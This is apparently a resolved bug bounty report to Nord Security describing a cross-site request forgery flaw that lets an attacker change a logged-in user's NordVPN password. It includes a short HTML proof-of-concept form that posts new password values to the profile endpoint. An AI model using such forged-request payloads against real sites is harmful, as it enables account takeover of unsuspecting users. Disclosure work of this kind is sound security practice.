CSRF to change password
Critical
N
Nord Security
Submitted None
Actions:
Reported by
paramdham
Vulnerability Details
Technical details and impact analysis
Description
Cross-Site Request Forgery (CSRF) is a type of attack that occurs when a malicious web site, email, blog, instant message, or program causes a user's web browser to perform an unwanted action on a trusted site for which the user is currently authenticated.
I have found CSRF to change password ,
POC
<html>
<body>
<form action="https://nordvpn.com/profile/" method="POST">
<input type="hidden" name="tmpl" value="settings" />
<input type="hidden" name="password" value="password" />
<input type="hidden" name="password_confirmation" value="password" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Thanks
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Cross-Site Request Forgery (CSRF)